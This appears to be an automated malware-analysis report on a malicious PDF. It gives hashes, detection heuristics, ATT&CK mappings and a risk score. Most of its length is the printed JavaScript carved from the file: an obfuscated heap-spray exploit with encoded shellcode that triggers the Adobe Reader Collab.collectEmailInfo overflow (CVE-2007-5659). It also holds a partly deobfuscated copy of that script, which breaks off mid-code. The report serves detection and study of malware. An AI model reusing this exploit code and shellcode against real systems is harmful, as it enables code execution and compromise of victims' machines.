PDF malware analysis — malicious · dab709e0cb8ec9ee

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-10

MD5: 53bcabfbdcb8c978cefb956aa5622438 SHA-1: c60f4b86aebfbb8231f6596571e2332ebfde076f SHA-256: dab709e0cb8ec9eec36bf309146410ac851d7e5138b54a9360a305645b9a4dee

238 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. An artifact named 'javascript_obj0031_000.js' was extracted, and static triage signals indicate obfuscation and a long encoded blob. This suggests the JavaScript is designed to perform malicious actions, likely downloading and executing a second-stage payload. The presence of embedded JavaScript within a PDF is a common delivery mechanism for malware.

Machine Learning

Nyx PDF Classifier malicious score 0.9988

Heuristics 9

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY

PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded file low PDF_EMBEDDED

PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL

The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`k1`	pdf-embedded-file	PDF EmbeddedFile object 26 at offset 0x1EC1	2041 bytes
SHA-256: `db8557e3348d83bf2d22446e8f0e505303bb00d7ef6d542289d21c4c712998e2`
`javascript_obj0031_000.js`	pdf-javascript-stream	PDF /JS object 31 at offset 0x12B202	13125 bytes
SHA-256: `e7cd69c470aa49cc3b7565d71b85c61cf70c3955add705414de9860a5705e827`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape; var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x65\x62\x39\x30\x25\x755\x6518\x25\x755\x6256\x25\x75068\x61\x25\x75303\x63\x25\x751474\x25\x756\x6266\x25\x7558\x630"+ "\x25\x758\x6146\x25\x75\x33226\x25\x7588\x634\x25\x75430\x33\x25\x75\x65\x6246\x25\x75\x658\x65\x62\x25\x75\x66\x66\x653\x25\x75\x66\x66\x66\x66"+ "\x25\x755048\x25\x755048\x25\x755048\x25\x755048\x25\x755942\x25\x754b43\x25\x755941\x25\x755841\x25\x755841\x25\x754646\x25\x756b41\x25\x757042"+ "\x25\x756c43\x25\x754b48\x25\x754843\x25\x756841\x25\x754b48\x25\x754843\x25\x755441\x25\x754b48\x25\x757843\x25\x754441\x25\x756d48\x25\x754b48"+ "\x25\x754843\x25\x755041\x25\x755643\x25\x757342\x25\x756d48\x25\x755843\x25\x755a43\x25\x755842\x25\x755541\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x754948\x25\x756744\x25\x754348\x25\x757442\x25\x755041\x25\x754348\x25\x757742\x25\x756444\x25\x756341\x25\x754142\x25\x756546\x25\x755445"+ "\x25\x757342\x25\x756843\x25\x754b48\x25\x756443\x25\x754444\x25\x754444\x25\x754b48\x25\x754d43\x25\x756441\x25\x754b48\x25\x754446\x25\x757041"+ "\x25\x757043\x25\x756344\x25\x756542\x25\x754b48\x25\x754243\x25\x757844\x25\x754b48\x25\x755243\x25\x757841\x25\x756344\x25\x756d42\x25\x755342"+ "\x25\x756c41\x25\x754143\x25\x754b48\x25\x756c41\x25\x754b48\x25\x756344\x25\x754542\x25\x756b41\x25\x754f42\x25\x756b41\x25\x757042\x25\x754c42"+ "\x25\x756c48\x25\x754448\x25\x757042\x25\x756446\x25\x756744\x25\x757142\x25\x757745\x25\x755541\x25\x756344\x25\x754842\x25\x755345\x25\x754442"+ "\x25\x756341\x25\x757443\x25\x754444\x25\x757041\x25\x756546\x25\x755142\x25\x754b48\x25\x755243\x25\x754444\x25\x756344\x25\x756d42\x25\x756e43"+ "\x25\x754b48\x25\x755441\x25\x754343\x25\x754b48\x25\x755243\x25\x754441\x25\x756344\x25\x756d42\x25\x754b48\x25\x756444\x25\x754b48\x25\x756344"+ "\x25\x757542\x25\x754948\x25\x754c43\x25\x754444\x25\x754441\x25\x756943\x25\x757342\x25\x757742\x25\x754d43\x25\x756c43\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x756243\x25\x755841\x25\x754d48\x25\x754d43\x25\x755443\x25\x755843\x25\x757846\x25\x755841\x25\x756444\x25\x755841"+ "\x25\x755841\x25\x754f42\x25\x756546\x25\x756441\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757844\x25\x756b41\x25\x757942"+ "\x25\x756e43\x25\x754b48\x25\x754543\x25\x755443\x25\x754b48\x25\x757543\x25\x756441\x25\x754b48\x25\x754742\x25\x757348\x25\x755942\x25\x757248"+ "\x25\x757742\x25\x756c48\x25\x756a41\x25\x757342\x25\x756a41\x25\x757242\x25\x756a48\x25\x754e42\x25\x757345\x25\x754e42\x25\x757a42\x25\x755242"+ "\x25\x754442\x25\x756243\x25\x755841\x25\x754d48\x25\x754d43\x25\x756843\x25\x755843\x25\x754f42\x25\x756546\x25\x755443\x25\x754b48\x25\x754546"+ "\x25\x756441\x25\x755a43\x25\x754f42\x25\x756546\x25\x754443\x25\x754f42\x25\x754546\x25\x754441\x25\x754b48\x25\x754546\x25\x756843\x25\x757141"+ "\x25\x754546\x25\x755043\x25\x754348\x25\x757543\x25\x755043\x25\x755841\x25\x757743\x25\x757248\x25\x754f42\x25\x756546\x25\x754443\x25\x754f42"+ "\x25\x754546\x25\x755041\x25\x757342\x25\x754e48\x25\x754643\x25\x755641\x25\x755445\x25\x754348\x25\x757948\x25\x757548\x25\x757043\x25\x754b42"+ "\x25\x755748\x25\x754d42\x25\x755741\x25\x756b41\x25\x757a42\x25\x754a48\x25\x755343\x25\x754743\x25\x756344\x25\x757742\x25\x75774b\x25\x756548"+ "\x25\x754f41\x25\x755841\x25\x757443\x25\x754e41\x25\x756d43\x25\x754a42\x25\x754841\x25\x754741\x25\x757143\x25\x755241\x25\x755842\x25\x756c48"+ "\x25\x755041\x25\x756a42\x25\x756646\x25\x756d48\x25\x75534b\x25\x757543\x25\x756f42\x25\x755848\x25\x754e42\x25\x754a48\x25\x755641\x25\x755445"+ "\x25\x755748\x25\x756344\x25\x755441\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x75734b\x25\x75734b\x25\x75734b\x25\x75734b\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x756446"+ "\x25\x756d43\x25\x756543\x25\x757843\x25\x757641\x25\x756d43\x25\x757043\x25\x756d43\x25\x755841\x25\x755842\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755543\x25\x754148\x25\x755545\x25\x756646\x25\x755841\x25\x755841\x25\x755841\x25\x755842\x25\x756c48\x25\x754e42\x25\x754f42"+ "\x25\x754f42\x25\x754b48\x25\x756845\x25\x754b48\x25\x754542\x25\x754b48\x25\x754e42\x25\x754b48\x25\x757645\x25\x754348\x25\x757142\x25\x756841"+ "\x25\x755842\x25\x756f48\x25\x754e42\x25\x754f42\x25\x754f42\x25\x756b41\x25\x757942\x25\x754948\x25\x754543\x25\x755846\x25\x754348\x25\x754d43"+ "\x25\x755846\x25\x756444\x25\x756b41\x25\x757942\x25\x755943\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x754444\x25\x756541"+ "\x25\x75684b\x25\x757a48\x25\x754a41\x25\x755841\x25\x757a43\x25\x755445\x25\x756541\x25\x75684b\x25\x75744b\x25\x754a41\x25\x755841\x25\x756746"+ "\x25\x755542\x25\x757846\x25\x754f42\x25\x755841\x25\x755841\x25\x755841\x25\x756243\x25\x754843\x25\x754f42\x25\x754546\x25\x757441\x25\x754948"+ "\x25\x754d43\x25\x755844\x25\x755843\x25\x757846\x25\x754f42\x25\x755841\x25\x755841\x25\x755841\x25\x754f42\x25\x754546\x25\x755441\x25\x754b48"+ "\x25\x757842\x25\x754b48\x25\x754d43\x25\x755844\x25\x756344\x25\x757142\x25\x754348\x25\x755842\x25\x756544\x25\x757642\x25\x755841\x25\x755841"+ "\x25\x754f42\x25\x756546\x25\x755844\x25\x754f42\x25\x754546\x25\x754841\x25\x756243\x25\x755841\x25\x756243\x25\x755841\x25\x757846\x25\x755841"+ "\x25\x754741\x25\x755841\x25\x755841\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757841\x25\x756243\x25\x755841\x25\x754d48"+ "\x25\x754d43\x25\x755443\x25\x755843\x25\x756243\x25\x756444\x25\x754d48\x25\x754d43\x25\x754446\x25\x755843\x25\x754f42\x25\x756546\x25\x755846"+ "\x25\x754f42\x25\x754546\x25\x757844\x25\x756243\x25\x755841\x25\x756243\x25\x755841\x25\x757846\x25\x754841\x25\x754741\x25\x755841\x25\x755841"+ "\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757841\x25\x754546\x25\x756243\x25\x755841\x25\x757846\x25\x75484b\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x756243\x25\x755a41\x25\x756243\x25\x755841\x25\x756243\x25\x755941\x25\x757846\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x754843\x25\x754d48\x25\x754d43\x25\x757846\x25\x755843\x25\x754348\x25\x754d43\x25\x754c41\x25\x756544\x25\x755345\x25\x755241\x25\x754b48"+ "\x25\x754542\x25\x754b48\x25\x754f42\x25\x754546\x25\x754b48\x25\x755445\x25\x754f42\x25\x756e43\x25\x754c41\x25\x755842\x25\x754142\x25\x754f42"+ "\x25\x754f42\x25\x754f42\x25\x755543\x25\x754348\x25\x754842\x25\x754f42\x25\x756546\x25\x755a41\x25\x755345\x25\x756141\x25\x754948\x25\x754d43"+ "\x25\x754443\x25\x757846\x25\x755841\x25\x756444\x25\x755841\x25\x755841\x25\x756243\x25\x754843\x25\x754f42\x25\x754546\x25\x757441\x25\x754948"+ "\x25\x754d43\x25\x756441\x25\x754b48\x25\x754d43\x25\x754446\x25\x754948\x25\x754d43\x25\x755043\x25\x755842\x25\x754243\x25\x754e42\x25\x754f42"+ "\x25\x754f42\x25\x754546\x25\x756b41\x25\x757942\x25\x755943\x25\x754d48\x25\x754d43\x25\x757846\x25\x755843\x25\x754348\x25\x754d43\x25\x757041"+ "\x25\x756544\x25\x755345\x25\x755241\x25\x754b48\x25\x754542\x25\x755048\x25\x755048\x25\x754546\x25\x754b48\x25\x755445\x25\x754f42\x25\x756e43"+ "\x25\x757041\x25\x755842\x25\x754142\x25\x754f42\x25\x754f42\x25\x754f42\x25\x755543\x25\x756243\x25\x755841\x25\x756243\x25\x754f42\x25\x754f42"+ "\x25\x754546\x25\x756444\x25\x755048\x25\x755048\x25\x755048\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755941\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x754843\x25\x755443\x25\x754143\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x754843\x25\x755443\x25\x754143\x25\x755841\x25\x755941\x25\x755941\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x754841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755a41\x25\x755841\x25\x755841\x25\x755841\x25\x755941\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755a41\x25\x755841\x25\x755841\x25\x755841"+ "\x25\x753030"); var o =""; for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93"); JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM; fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93"); NGwa = 20; MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU; sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV); sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV); while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl; var dakslfjaljfklasfjasdlk = Array; afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk(); for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY; var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c"); while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC; var adfafasdffsfsdfdfvcvv = Collab; var dfzfddfgfgasfasddcacs = this; dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectEmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202	7665 bytes
SHA-256: `bdaf58b20ef070c4a6891300fdd6daf6fc2e9efa2f6eae2b5d2f8160ba6a4b6f`
Detection ClamAV: No threats found Obfuscation or payload: likely 12 of 24 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape; var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u5048%u5048%u5048%u5048%u5942%u4b43%u5941%u5841%u5841%u4646%u6b41%u7042%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5643%u7342%u6d48%u5843%u5a43%u5842%u5541%u5841%u5841%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u7742%u4d43%u6c43%u5841%u5841%u5841%u5841%u6243%u5841%u4d48%u4d43%u5443%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u6441%u4f42%u6546%u5846%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5443%u4b48%u7543%u6441%u4b48%u4742%u7348%u5942%u7248"+ "%u7742%u6c48%u6a41%u7342%u6a41%u7242%u6a48%u4e42%u7345%u4e42%u7a42%u5242%u4442%u6243%u5841%u4d48%u4d43%u6843%u5843%u4f42%u6546%u5443%u4b48%u4546%u6441%u5a43%u4f42%u6546%u4443%u4f42%u4546%u4441%u4b48%u4546%u6843%u7141%u4546%u5043%u4348%u7543%u5043%u5841%u7743%u7248%u4f42%u6546%u4443%u4f42%u4546%u5041%u7342%u4e48%u4643%u5641%u5445%u4348%u7948%u7548%u7043%u4b42%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u6548%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u734b%u734b%u734b%u734b%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6446%u6d43%u6543%u7843%u7641%u6d43%u7043%u6d43%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545%u6646%u5841%u5841%u5841%u5842%u6c48%u4e42%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841"+ "%u5842%u6f48%u4e42%u4f42%u4f42%u6b41%u7942%u4948%u4543%u5846%u4348%u4d43%u5846%u6444%u6b41%u7942%u5943%u4f42%u6546%u5846%u4f42%u4546%u4444%u6541%u684b%u7a48%u4a41%u5841%u7a43%u5445%u6541%u684b%u744b%u4a41%u5841%u6746%u5542%u7846%u4f42%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u5844%u5843%u7846%u4f42%u5841%u5841%u5841%u4f42%u4546%u5441%u4b48%u7842%u4b48%u4d43%u5844%u6344%u7142%u4348%u5842%u6544%u7642%u5841%u5841%u4f42%u6546%u5844%u4f42%u4546%u4841%u6243%u5841%u6243%u5841%u7846%u5841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42%u4546%u7841%u6243%u5841%u4d48%u4d43%u5443%u5843%u6243%u6444%u4d48%u4d43%u4446%u5843%u4f42%u6546%u5846%u4f42%u4546%u7844%u6243%u5841%u6243%u5841%u7846%u4841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42%u4546%u7841%u4546%u6243%u5841%u7846%u484b%u5841%u5841%u5841%u6243%u5a41%u6243%u5841%u6243%u5941%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u7846%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u4b48%u4f42%u4546%u4b48%u5445%u4f42%u6e43%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4443%u7846%u5841%u6444%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948"+ "%u4d43%u6441%u4b48%u4d43%u4446%u4948%u4d43%u5043%u5842%u4243%u4e42%u4f42%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u7846%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243%u5841%u6243%u4f42%u4f42%u4546%u6444%u5048%u5048%u5048%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u4843%u5443%u4143%u5841%u5841%u5841%u5841%u5841"+ "%u4843%u5443%u4143%u5841%u5941%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u4841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5a41%u5841%u5841%u5841%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5a41%u5841%u5841%u5841%u3030"); var o =""; for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93"); JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM; fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93"); NGwa = 20; MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length while 